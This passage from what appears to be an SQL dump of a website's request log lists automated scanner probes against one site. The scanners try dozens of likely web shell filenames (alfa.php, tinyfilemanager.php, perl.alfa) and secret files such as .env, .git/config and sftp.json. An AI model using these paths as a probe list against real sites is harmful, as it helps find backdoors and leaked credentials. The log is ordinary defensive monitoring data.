11:43:52'),(1537,'https://amb18b.com/yanz.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:53','2025-10-26 11:43:53'),(1538,'https://amb18b.com/config.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:43:54','2025-10-26 11:43:54'),(1539,'https://amb18b.com/network.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:56','2025-10-26 11:43:56'),(1540,'https://amb18b.com/wp-2019.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:43:58','2025-10-26 11:43:58'),(1541,'https://amb18b.com/bypass.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:00','2025-10-26 11:44:00'),(1542,'https://amb18b.com/wp-includes/IXR/admin.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:02','2025-10-26 11:44:02'),(1543,'https://amb18b.com/wp-includes/theme-compat/wp-login.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:04','2025-10-26 11:44:04'),(1544,'https://amb18b.com/tiny.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 11:44:06','2025-10-26 11:44:06'),(1545,'https://amb18b.com/lock.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:08','2025-10-26 11:44:08'),(1546,'https://amb18b.com/mail.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:44:11','2025-10-26 11:44:11'),(1547,'https://amb18b.com/wp-includes/system_log.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:44:12','2025-10-26 11:44:12'),(1548,'https://amb18b.com/file.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:44:13','2025-10-26 11:44:13'),(1549,'https://amb18b.com/as.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:15','2025-10-26 11:44:15'),(1550,'https://amb18b.com/.well-known/acme-challenge/index.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:18','2025-10-26 11:44:18'),(1551,'https://amb18b.com/manager.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 11:44:22','2025-10-26 11:44:22'),(1552,'https://amb18b.com/plugins/pwnd/as.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:24','2025-10-26 11:44:24'),(1553,'https://amb18b.com/wp-configs.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:44:25','2025-10-26 11:44:25'),(1554,'https://amb18b.com/wp-includes/html-api/wp-conflg.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 11:44:29','2025-10-26 11:44:29'),(1555,'https://amb18b.com/wp-includes/js/crop/zmFM.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:31','2025-10-26 11:44:31'),(1556,'https://amb18b.com/wp-includes/rest-api/fields/index.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:44:33','2025-10-26 11:44:33'),(1557,'https://amb18b.com/index/fucku.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:34','2025-10-26 11:44:34'),(1558,'https://amb18b.com/upload/wp-info.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:36','2025-10-26 11:44:36'),(1559,'https://amb18b.com/post.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:38','2025-10-26 11:44:38'),(1560,'https://amb18b.com/.well-known/acme-challenge/admin.php','172.192.51.163','Direct Access',1,'2025-10-26 11:44:39','2025-10-26 11:44:39'),(1561,'https://amb18b.com/manager/media/script/mootools/mootools.js','91.233.172.251','Direct Access',1,'2025-10-26 12:59:54','2025-10-26 12:59:54'),(1562,'https://amb18b.com/manager/assets/modext/core/modx.js','89.188.177.91','Direct Access',1,'2025-10-26 13:04:56','2025-10-26 13:04:56'),(1563,'https://amb18b.com/manager/assets/modext/core/modx.js','37.77.111.217','Direct Access',1,'2025-10-26 13:07:09','2025-10-26 13:07:09'),(1564,'https://amb18b.com/wp-admin/asasx.php','13.89.226.197','Direct Access',1,'2025-10-26 13:16:43','2025-10-26 13:16:43'),(1565,'https://amb18b.com/wp-admin/alfa.php','13.89.226.197','Direct Access',1,'2025-10-26 13:16:51','2025-10-26 13:16:51'),(1566,'https://amb18b.com/wp-admin/atomlib.php','13.89.226.197','Direct Access',1,'2025-10-26 13:16:59','2025-10-26 13:16:59'),(1567,'https://amb18b.com/wp-admin/ab.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:07','2025-10-26 13:17:07'),(1568,'https://amb18b.com/wp-admin/akc.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:10','2025-10-26 13:17:10'),(1569,'https://amb18b.com/wp-admin/file2.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:16','2025-10-26 13:17:16'),(1570,'https://amb18b.com/wp-admin/wsa.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:18','2025-10-26 13:17:18'),(1571,'https://amb18b.com/wp-admin/mm.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:20','2025-10-26 13:17:20'),(1572,'https://amb18b.com/wp-admin/wp.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:22','2025-10-26 13:17:22'),(1573,'https://amb18b.com/wp-admin/abcd.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:25','2025-10-26 13:17:25'),(1574,'https://amb18b.com/wp-admin/lock360.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:27','2025-10-26 13:17:27'),(1575,'https://amb18b.com/wp-admin/classwithtostring.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:36','2025-10-26 13:17:36'),(1576,'https://amb18b.com/wp-admin/function.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:38','2025-10-26 13:17:38'),(1577,'https://amb18b.com/wp-admin/moon.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:40','2025-10-26 13:17:40'),(1578,'https://amb18b.com/wp-admin/flower.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:52','2025-10-26 13:17:52'),(1579,'https://amb18b.com/wp-admin/buy.php','13.89.226.197','Direct Access',1,'2025-10-26 13:17:54','2025-10-26 13:17:54'),(1580,'https://amb18b.com/wp-admin/cong.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:06','2025-10-26 13:18:06'),(1581,'https://amb18b.com/wp-admin/autoload_classmap.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:08','2025-10-26 13:18:08'),(1582,'https://amb18b.com/wp-admin/file.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:10','2025-10-26 13:18:10'),(1583,'https://amb18b.com/wp-admin/makeasmtp.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:23','2025-10-26 13:18:23'),(1584,'https://amb18b.com/wp-admin/w.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:25','2025-10-26 13:18:25'),(1585,'https://amb18b.com/wp-admin/chosen.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:32','2025-10-26 13:18:32'),(1586,'https://amb18b.com/wp-admin/goat.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:34','2025-10-26 13:18:34'),(1587,'https://amb18b.com/wp-admin/gecko.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:43','2025-10-26 13:18:43'),(1588,'https://amb18b.com/wp-admin/goods.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:57','2025-10-26 13:18:57'),(1589,'https://amb18b.com/wp-admin/bala.php','13.89.226.197','Direct Access',1,'2025-10-26 13:18:59','2025-10-26 13:18:59'),(1590,'https://amb18b.com/wp-admin/aa.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:03','2025-10-26 13:19:03'),(1591,'https://amb18b.com/wp-admin/autoload_classmap/function.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:06','2025-10-26 13:19:06'),(1592,'https://amb18b.com/wp-admin/ioxi-o.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:11','2025-10-26 13:19:11'),(1593,'https://amb18b.com/wp-admin/ova.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:13','2025-10-26 13:19:13'),(1594,'https://amb18b.com/wp-admin/tinyfilemanager.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:24','2025-10-26 13:19:24'),(1595,'https://amb18b.com/aa.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:27','2025-10-26 13:19:27'),(1596,'https://amb18b.com/abcd.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:30','2025-10-26 13:19:30'),(1597,'https://amb18b.com/about.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:32','2025-10-26 13:19:32'),(1598,'https://amb18b.com/admin.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:34','2025-10-26 13:19:34'),(1599,'https://amb18b.com/alfa.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:37','2025-10-26 13:19:37'),(1600,'https://amb18b.com/chosen.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:39','2025-10-26 13:19:39'),(1601,'https://amb18b.com/classwithtostring.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:41','2025-10-26 13:19:41'),(1602,'https://amb18b.com/code.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:44','2025-10-26 13:19:44'),(1603,'https://amb18b.com/edit.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:47','2025-10-26 13:19:47'),(1604,'https://amb18b.com/file.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:51','2025-10-26 13:19:51'),(1605,'https://amb18b.com/flower.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:55','2025-10-26 13:19:55'),(1606,'https://amb18b.com/goods.php','13.89.226.197','Direct Access',1,'2025-10-26 13:19:57','2025-10-26 13:19:57'),(1607,'https://amb18b.com/ioxi-o.php','13.89.226.197','Direct Access',1,'2025-10-26 13:20:00','2025-10-26 13:20:00'),(1608,'https://amb18b.com/moon.php','13.89.226.197','Direct Access',1,'2025-10-26 13:20:03','2025-10-26 13:20:03'),(1609,'https://amb18b.com/w.php','13.89.226.197','Direct Access',1,'2025-10-26 13:20:05','2025-10-26 13:20:05'),(1610,'https://amb18b.com/wp-admin/css/colors/blue/index.php','13.89.226.197','Direct Access',1,'2025-10-26 13:20:08','2025-10-26 13:20:08'),(1611,'https://amb18b.com/wp-admin/js/widgets/','13.89.226.197','Direct Access',1,'2025-10-26 13:20:10','2025-10-26 13:20:10'),(1612,'https://amb18b.com/wp-admin/network/chosen.php','13.89.226.197','Direct Access',1,'2025-10-26 13:20:12','2025-10-26 13:20:12'),(1613,'https://amb18b.com/wp-includes/blocks/comments/','13.89.226.197','Direct Access',1,'2025-10-26 13:20:25','2025-10-26 13:20:25'),(1614,'https://amb18b.com/wp-setup.php','13.89.226.197','Direct Access',1,'2025-10-26 13:20:28','2025-10-26 13:20:28'),(1615,'https://amb18b.com/wp.php','13.89.226.197','Direct Access',1,'2025-10-26 13:20:31','2025-10-26 13:20:31'),(1616,'https://amb18b.com/wsa.php','13.89.226.197','Direct Access',1,'2025-10-26 13:20:34','2025-10-26 13:20:34'),(1617,'https://amb18b.com/components/com_facileforms/libraries/jquery/tooltip.js','196.251.87.191','Direct Access',1,'2025-10-26 15:19:49','2025-10-26 15:19:49'),(1618,'https://amb18b.com/wordpress','172.200.226.194','Direct Access',1,'2025-10-26 15:50:28','2025-10-26 15:50:28'),(1619,'https://amb18b.com/wp','172.200.226.194','Direct Access',1,'2025-10-26 15:50:35','2025-10-26 15:50:35'),(1620,'https://amb18b.com/bc','172.200.226.194','Direct Access',1,'2025-10-26 15:50:37','2025-10-26 15:50:37'),(1621,'https://amb18b.com/bk','172.200.226.194','Direct Access',1,'2025-10-26 15:50:39','2025-10-26 15:50:39'),(1622,'https://amb18b.com/backup','172.200.226.194','Direct Access',1,'2025-10-26 15:50:41','2025-10-26 15:50:41'),(1623,'https://amb18b.com/old','172.200.226.194','Direct Access',1,'2025-10-26 15:50:42','2025-10-26 15:50:42'),(1624,'https://amb18b.com/new','172.200.226.194','Direct Access',1,'2025-10-26 15:50:44','2025-10-26 15:50:44'),(1625,'https://amb18b.com/main','172.200.226.194','Direct Access',1,'2025-10-26 15:50:45','2025-10-26 15:50:45'),(1626,'https://amb18b.com/llms.txt','149.56.150.233','Direct Access',1,'2025-10-26 17:34:42','2025-10-26 17:34:42'),(1627,'https://amb18b.com/humans.txt','149.56.150.233','Direct Access',1,'2025-10-26 17:34:44','2025-10-26 17:34:44'),(1628,'https://amb18b.com/ads.txt','149.56.150.233','Direct Access',1,'2025-10-26 17:34:45','2025-10-26 17:34:45'),(1629,'https://amb18b.com/security.txt','149.56.150.233','Direct Access',1,'2025-10-26 17:34:47','2025-10-26 17:34:47'),(1630,'https://amb18b.com/.well-known/security.txt','149.56.150.233','Direct Access',1,'2025-10-26 17:34:49','2025-10-26 17:34:49'),(1631,'https://amb18b.com/sitemap.xml','157.55.39.8','Direct Access',1,'2025-10-26 18:11:15','2025-10-26 18:11:15'),(1632,'https://amb18b.com/sitemap.xml','157.55.39.192','Direct Access',1,'2025-10-26 19:09:31','2025-10-26 19:09:31'),(1633,'https://amb18b.com/rest','93.190.18.122','Direct Access',1,'2025-10-26 23:02:31','2025-10-26 23:02:31'),(1634,'https://amb18b.com/wordpress','172.200.226.194','Direct Access',1,'2025-10-26 23:19:59','2025-10-26 23:19:59'),(1635,'https://amb18b.com/wp','172.200.226.194','Direct Access',1,'2025-10-26 23:20:03','2025-10-26 23:20:03'),(1636,'https://amb18b.com/bc','172.200.226.194','Direct Access',1,'2025-10-26 23:20:04','2025-10-26 23:20:04'),(1637,'https://amb18b.com/bk','172.200.226.194','Direct Access',1,'2025-10-26 23:20:05','2025-10-26 23:20:05'),(1638,'https://amb18b.com/backup','172.200.226.194','Direct Access',1,'2025-10-26 23:20:07','2025-10-26 23:20:07'),(1639,'https://amb18b.com/old','172.200.226.194','Direct Access',1,'2025-10-26 23:20:09','2025-10-26 23:20:09'),(1640,'https://amb18b.com/new','172.200.226.194','Direct Access',1,'2025-10-26 23:20:10','2025-10-26 23:20:10'),(1641,'https://amb18b.com/main','172.200.226.194','Direct Access',1,'2025-10-26 23:20:11','2025-10-26 23:20:11'),(1642,'https://amb18b.com/graphql','167.99.182.39','Direct Access',1,'2025-10-27 00:13:13','2025-10-27 00:13:13'),(1643,'https://amb18b.com/api','167.99.182.39','Direct Access',1,'2025-10-27 00:13:14','2025-10-27 00:13:14'),(1644,'https://amb18b.com/api/graphql','167.99.182.39','Direct Access',1,'2025-10-27 00:13:15','2025-10-27 00:13:15'),(1645,'https://amb18b.com/graphql/api','167.99.182.39','Direct Access',1,'2025-10-27 00:13:16','2025-10-27 00:13:16'),(1646,'https://amb18b.com/api/gql','167.99.182.39','Direct Access',1,'2025-10-27 00:13:16','2025-10-27 00:13:16'),(1647,'https://amb18b.com/swagger-ui.html','167.99.182.39','Direct Access',1,'2025-10-27 00:13:17','2025-10-27 00:13:17'),(1648,'https://amb18b.com/swagger/index.html','167.99.182.39','Direct Access',1,'2025-10-27 00:13:18','2025-10-27 00:13:18'),(1649,'https://amb18b.com/swagger/swagger-ui.html','167.99.182.39','Direct Access',1,'2025-10-27 00:13:18','2025-10-27 00:13:18'),(1650,'https://amb18b.com/webjars/swagger-ui/index.html','167.99.182.39','Direct Access',1,'2025-10-27 00:13:19','2025-10-27 00:13:19'),(1651,'https://amb18b.com/swagger.json','167.99.182.39','Direct Access',1,'2025-10-27 00:13:20','2025-10-27 00:13:20'),(1652,'https://amb18b.com/swagger/v1/swagger.json','167.99.182.39','Direct Access',1,'2025-10-27 00:13:20','2025-10-27 00:13:20'),(1653,'https://amb18b.com/v2/api-docs','167.99.182.39','Direct Access',1,'2025-10-27 00:13:21','2025-10-27 00:13:21'),(1654,'https://amb18b.com/v3/api-docs','167.99.182.39','Direct Access',1,'2025-10-27 00:13:22','2025-10-27 00:13:22'),(1655,'https://amb18b.com/api-docs/swagger.json','167.99.182.39','Direct Access',1,'2025-10-27 00:13:22','2025-10-27 00:13:22'),(1656,'https://amb18b.com/api/swagger.json','167.99.182.39','Direct Access',1,'2025-10-27 00:13:23','2025-10-27 00:13:23'),(1657,'https://amb18b.com/@vite/env','167.99.182.39','Direct Access',1,'2025-10-27 00:13:24','2025-10-27 00:13:24'),(1658,'https://amb18b.com/actuator/env','167.99.182.39','Direct Access',1,'2025-10-27 00:13:24','2025-10-27 00:13:24'),(1659,'https://amb18b.com/server','167.99.182.39','Direct Access',1,'2025-10-27 00:13:25','2025-10-27 00:13:25'),(1660,'https://amb18b.com/.vscode/sftp.json','167.99.182.39','Direct Access',1,'2025-10-27 00:13:25','2025-10-27 00:13:25'),(1661,'https://amb18b.com/about','167.99.182.39','Direct Access',1,'2025-10-27 00:13:26','2025-10-27 00:13:26'),(1662,'https://amb18b.com/debug/default/view?panel=config','167.99.182.39','Direct Access',1,'2025-10-27 00:13:26','2025-10-27 00:13:26'),(1663,'https://amb18b.com/v2/_catalog','167.99.182.39','Direct Access',1,'2025-10-27 00:13:27','2025-10-27 00:13:27'),(1664,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','167.99.182.39','Direct Access',1,'2025-10-27 00:13:28','2025-10-27 00:13:28'),(1665,'https://amb18b.com/server-status','167.99.182.39','Direct Access',1,'2025-10-27 00:13:28','2025-10-27 00:13:28'),(1666,'https://amb18b.com/login.action','167.99.182.39','Direct Access',1,'2025-10-27 00:13:29','2025-10-27 00:13:29'),(1667,'https://amb18b.com/_all_dbs','167.99.182.39','Direct Access',1,'2025-10-27 00:13:30','2025-10-27 00:13:30'),(1668,'https://amb18b.com/.DS_Store','167.99.182.39','Direct Access',1,'2025-10-27 00:13:31','2025-10-27 00:13:31'),(1669,'https://amb18b.com/.env','167.99.182.39','Direct Access',1,'2025-10-27 00:13:31','2025-10-27 00:13:31'),(1670,'https://amb18b.com/.git/config','167.99.182.39','Direct Access',1,'2025-10-27 00:13:32','2025-10-27 00:13:32'),(1671,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','167.99.182.39','Direct Access',1,'2025-10-27 00:13:33','2025-10-27 00:13:33'),(1672,'https://amb18b.com/config.json','167.99.182.39','Direct Access',1,'2025-10-27 00:13:33','2025-10-27 00:13:33'),(1673,'https://amb18b.com/telescope/requests','167.99.182.39','Direct Access',1,'2025-10-27 00:13:34','2025-10-27 00:13:34'),(1674,'https://amb18b.com/info.php','167.99.182.39','Direct Access',1,'2025-10-27 00:13:34','2025-10-27 00:13:34'),(1675,'https://amb18b.com/.env','45.139.104.183','Direct Access',1,'2025-10-27 02:35:58','2025-10-27 02:35:58'),(1676,'https://amb18b.com/wp-plain.php','172.190.76.170','Invalid Referrer',1,'2025-10-27 04:57:43','2025-10-27 04:57:43'),(1677,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','172.190.76.170','Invalid Referrer',1,'2025-10-27 04:57:44','2025-10-27 04:57:44'),(1678,'https://amb18b.com/','172.190.76.170','Invalid Referrer',2,'2025-10-27 04:57:48','2025-10-27 04:57:47'),(1679,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','172.190.76.170','Direct Access',1,'2025-10-27 04:57:51','2025-10-27 04:57:51'),(1680,'https://amb18b.com/alfacgiapi/perl.alfa','172.190.76.170','Invalid Referrer',1,'2025-10-27 04:57:52','2025-10-27 04:57:52'),(1681,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','172.190.76.170','Direct Access',1,'2025-10-27 04:57:55','2025-10-27 04:57:55'),(1682,'https://amb18b.com/default.js','36.255.98.220','Direct Access',1,'2025-10-27 05:29:18','2025-10-27 05:29:18'),(1683,'https://amb18b.com/wp-emoji-release.min.js','36.255.98.220','Direct Access',1,'2025-10-27 05:29:19','2025-10-27 05:29:19'),(1684,'https://amb18b.com/aa.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:17','2025-10-27 05:30:17'),(1685,'https://amb18b.com/abcd.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:19','2025-10-27 05:30:19'),(1686,'https://amb18b.com/admin.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:21','2025-10-27 05:30:21'),(1687,'https://amb18b.com/buy.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:23','2025-10-27 05:30:23'),(1688,'https://amb18b.com/cgi-bin/','52.173.191.198','Direct Access',1,'2025-10-27 05:30:25','2025-10-27 05:30:25'),(1689,'https://amb18b.com/edit.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:26','2025-10-27 05:30:26'),(1690,'https://amb18b.com/file.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:28','2025-10-27 05:30:28'),(1691,'https://amb18b.com/flower.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:30','2025-10-27 05:30:30'),(1692,'https://amb18b.com/images/index.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:32','2025-10-27 05:30:32'),(1693,'https://amb18b.com/info.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:33','2025-10-27 05:30:33'),(1694,'https://amb18b.com/ioxi-o.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:35','2025-10-27 05:30:35'),(1695,'https://amb18b.com/nc4.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:37','2025-10-27 05:30:37'),(1696,'https://amb18b.com/wp-admin/includes/','52.173.191.198','Direct Access',1,'2025-10-27 05:30:39','2025-10-27 05:30:39'),(1697,'https://amb18b.com/wp-good.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:44','2025-10-27 05:30:44'),(1698,'https://amb18b.com/wp-includes/Text/Diff/Renderer/','52.173.191.198','Direct Access',1,'2025-10-27 05:30:46','2025-10-27 05:30:46'),(1699,'https://amb18b.com/wp-includes/style-engine/','52.173.191.198','Direct Access',1,'2025-10-27 05:30:47','2025-10-27 05:30:47'),(1700,'https://amb18b.com/xmrlpc.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:49','2025-10-27 05:30:49'),(1701,'https://amb18b.com/about.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:51','2025-10-27 05:30:51'),(1702,'https://amb18b.com/adminfuns.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:53','2025-10-27 05:30:53'),(1703,'https://amb18b.com/alfa.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:54','2025-10-27 05:30:54'),(1704,'https://amb18b.com/asasx.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:56','2025-10-27 05:30:56'),(1705,'https://amb18b.com/autoload_classmap.php','52.173.191.198','Direct Access',1,'2025-10-27 05:30:58','2025-10-27 05:30:58'),(1706,'https://amb18b.com/classwithtostring.php','52.173.191.198','Direct Access',1,'2025-10-27 05:31:00','2025-10-27 05:31:00'),(1707,'https://amb18b.com/cong.php','52.173.191.198','Direct Access',1,'2025-10-27 05:31:02','2025-10-27 05:31:02'),(1708,'https://amb18b.com/file2.php','52.173.191.198','Direct Access',1,'2025-10-27 05:31:04','2025-10-27 05:31:04'),(1709,'https://amb18b.com/moon.php','52.173.191.198','Direct Access',1,'2025-10-27 05:31:05','2025-10-27 05:31:05'),(1710,'https://amb18b.com/wp-admin/css/colors/blue/index.php','52.173.191.198','Direct Access',1,'2025-10-27 05:31:07','2025-10-27 05:31:07'),(1711,'https://amb18b.com/wp-includes/IXR/','52.173.191.198','Direct Access',1,'2025-10-27 05:31:16','2025-10-27 05:31:16'),(1712,'https://amb18b.com/wp-includes/block-supports/','52.173.191.198','Direct Access',1,'2025-10-27 05:31:18','2025-10-27 05:31:18'),(1713,'https://amb18b.com/wp-includes/fonts/','52.173.191.198','Direct Access',1,'2025-10-27 05:31:19','2025-10-27 05:31:19'),(1714,'https://amb18b.com/wp-includes/fonts/index.php','52.173.191.198','Direct Access',1,'2025-10-27 05:31:21','2025-10-27 05:31:21'),(1715,'https://amb18b.com/wp-includes/js/crop/','52.173.191.198','Direct Access',1,'2025-10-27 05:31:23','2025-10-27 05:31:23'),(1716,'https://amb18b.com/wp-includes/rest-api/','52.173.191.198','Direct Access',1,'2025-10-27 05:31:25','2025-10-27 05:31:25'),(1717,'https://amb18b.com/wp-includes/widgets/','52.173.191.198','Direct Access',1,'2025-10-27 05:31:27','2025-10-27 05:31:27'),(1718,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','172.190.76.170','Invalid Referrer',1,'2025-10-27 07:34:36','2025-10-27 07:34:36'),(1719,'https://amb18b.com/wp-plain.php','172.190.76.170','Invalid Referrer',1,'2025-10-27 07:34:37','2025-10-27 07:34:37'),(1720,'https://amb18b.com/','172.190.76.170','Invalid Referrer',2,'2025-10-27 07:34:40','2025-10-27 07:34:39'),(1721,'https://amb18b.com/alfacgiapi/perl.alfa','172.190.76.170','Invalid Referrer',1,'2025-10-27 07:34:40','2025-10-27 07:34:40'),(1722,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','172.190.76.170','Direct Access',1,'2025-10-27 07:34:42','2025-10-27 07:34:42'),(1723,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','172.190.76.170','Direct Access',1,'2025-10-27 07:34:46','2025-10-27 07:34:46'),(1724,'https://amb18b.com/inputs.php','109.196.71.20','Direct Access',1,'2025-10-27 09:12:19','2025-10-27 09:12:19'),(1725,'https://amb18b.com/shoha.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:10','2025-10-27 16:49:10'),(1726,'https://amb18b.com/444.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:11','2025-10-27 16:49:11'),(1727,'https://amb18b.com/hk.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:12','2025-10-27 16:49:12'),(1728,'https://amb18b.com/hook.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:13','2025-10-27 16:49:13'),(1729,'https://amb18b.com/atomlib.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:14','2025-10-27 16:49:14'),(1730,'https://amb18b.com/geck.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:15','2025-10-27 16:49:15'),(1731,'https://amb18b.com/file88.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:16','2025-10-27 16:49:16'),(1732,'https://amb18b.com/gold.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:17','2025-10-27 16:49:17'),(1733,'https://amb18b.com/moo.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:18','2025-10-27 16:49:18'),(1734,'https://amb18b.com/file2.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:19','2025-10-27 16:49:19'),(1735,'https://amb18b.com/afile.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:20','2025-10-27 16:49:20'),(1736,'https://amb18b.com/1.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:21','2025-10-27 16:49:21'),(1737,'https://amb18b.com/info.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:22','2025-10-27 16:49:22'),(1738,'https://amb18b.com/gmo.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:24','2025-10-27 16:49:24'),(1739,'https://amb18b.com/bless5.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:25','2025-10-27 16:49:25'),(1740,'https://amb18b.com/te.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:26','2025-10-27 16:49:26'),(1741,'https://amb18b.com/cccc.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:27','2025-10-27 16:49:27'),(1742,'https://amb18b.com/usep.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:28','2025-10-27 16:49:28'),(1743,'https://amb18b.com/fileas.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:29','2025-10-27 16:49:29'),(1744,'https://amb18b.com/haa.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:30','2025-10-27 16:49:30'),(1745,'https://amb18b.com/gfile.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:31','2025-10-27 16:49:31'),(1746,'https://amb18b.com/gelap.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:33','2025-10-27 16:49:33'),(1747,'https://amb18b.com/a.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:34','2025-10-27 16:49:34'),(1748,'https://amb18b.com/wpls.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:35','2025-10-27 16:49:35'),(1749,'https://amb18b.com/wp-aaa.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:36','2025-10-27 16:49:36'),(1750,'https://amb18b.com/wp.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:37','2025-10-27 16:49:37'),(1751,'https://amb18b.com/333.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:39','2025-10-27 16:49:39'),(1752,'https://amb18b.com/class-wp.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:40','2025-10-27 16:49:40'),(1753,'https://amb18b.com/pp.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:41','2025-10-27 16:49:41'),(1754,'https://amb18b.com/031.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:42','2025-10-27 16:49:42'),(1755,'https://amb18b.com/tor.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:43','2025-10-27 16:49:43'),(1756,'https://amb18b.com/thh.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:44','2025-10-27 16:49:44'),(1757,'https://amb18b.com/klex.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:45','2025-10-27 16:49:45'),(1758,'https://amb18b.com/a2.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:46','2025-10-27 16:49:46'),(1759,'https://amb18b.com/errorfile.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:47','2025-10-27 16:49:47'),(1760,'https://amb18b.com/error.php','48.218.150.44','Direct Access',1,'2025-10-27 16:49:48','2025-10-27 